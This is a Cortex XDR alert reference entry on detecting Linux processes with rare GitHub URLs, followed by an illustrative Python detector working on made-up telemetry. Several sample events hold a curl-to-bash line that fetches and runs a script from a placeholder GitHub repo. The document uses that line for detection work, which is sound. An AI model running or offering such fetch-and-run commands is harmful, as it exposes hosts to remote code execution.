Linux process execution with a rare GitHub URL

Cortex XDR Analytics Alert Reference by data source

Product
Cortex XDR
Last date published
2025-01-19
Category
Analytics Alert Reference
Index by
data source

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

3 Hours

Required Data

  • Requires:
    • XDR Agent

Detection Modules

Detector Tags

ATT&CK Tactic

Execution (TA0002)

ATT&CK Technique

Command and Scripting Interpreter (T1059)

Severity

Informational

Description

A process was executed with an uncommon GitHub URL in its command line. This may have legitimate uses, but it might also be used by attackers to download malicious payloads.

Attacker's Goals

Download a second-stage payload for execution.

Investigative actions

  • Check if the initiator process is malicious.
  • Check the user activity on the same agent at that time.
  • Check if the host is a development server.
  • Check whether this installation was part of several installations performed at the same time.
  • Check for additional file/network operations by the same process instance.
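The rarity logic this alert describes (a GitHub URL that was not seen across the fleet during the 30-day training period, with a 3-hour deduplication window per host and URL) can be sketched as follows. This is an added illustration, not Cortex XDR's own detector; the events, the URL pattern and the two-host baseline threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry: (timestamp, host, command line). Not real data.
TRAINING_EVENTS = [
    ("2025-01-01T09:00:00", "build-01", "git clone https://github.com/example-org/app.git"),
    ("2025-01-02T09:00:00", "build-02", "git clone https://github.com/example-org/app.git"),
    ("2025-01-03T09:00:00", "build-03", "git clone https://github.com/example-org/app.git"),
    ("2025-01-05T11:00:00", "dev-07", "pip install git+https://github.com/example-org/lib.git"),
]
TEST_EVENTS = [
    ("2025-01-20T10:00:00", "web-04", "curl -sL https://raw.githubusercontent.com/unknown-user/repo/main/x.sh | bash"),
    ("2025-01-20T11:30:00", "web-04", "curl -sL https://raw.githubusercontent.com/unknown-user/repo/main/x.sh | bash"),
    ("2025-01-20T12:00:00", "build-01", "git clone https://github.com/example-org/app.git"),
    ("2025-01-20T13:00:00", "dev-07", "ls -la /tmp"),
    ("2025-01-20T14:00:00", "web-04", "curl -sL https://raw.githubusercontent.com/unknown-user/repo/main/x.sh | bash"),
]

# Assumed pattern: github.com and *.githubusercontent.com URLs in a command line.
GITHUB_URL = re.compile(r"https?://(?:[\w.-]+\.)?(?:github\.com|githubusercontent\.com)/[^\s\"']+")
DEDUP_WINDOW = timedelta(hours=3)  # deduplication period stated by the alert reference

def extract_urls(cmdline):
    return GITHUB_URL.findall(cmdline)

def build_baseline(events, min_hosts=2):
    """URLs seen on at least min_hosts distinct hosts during training count as common."""
    hosts_per_url = defaultdict(set)
    for _, host, cmd in events:
        for url in extract_urls(cmd):
            hosts_per_url[url].add(host)
    return {url for url, hosts in hosts_per_url.items() if len(hosts) >= min_hosts}

def detect(events, baseline, dedup=DEDUP_WINDOW):
    """Return (timestamp, host, url) alerts for rare URLs, deduplicated per host+url."""
    last_alert = {}
    alerts = []
    for ts, host, cmd in sorted(events):  # ISO timestamps sort chronologically
        t = datetime.fromisoformat(ts)
        for url in extract_urls(cmd):
            if url in baseline:
                continue  # common across the fleet during training: not rare
            key = (host, url)
            if key in last_alert and t - last_alert[key] < dedup:
                continue  # still inside the deduplication window
            last_alert[key] = t
            alerts.append((ts, host, url))
    return alerts
```

Running `detect(TEST_EVENTS, build_baseline(TRAINING_EVENTS))` yields two alerts for web-04 (10:00 and 14:00); the 11:30 repeat is suppressed and the well-known org URL never fires.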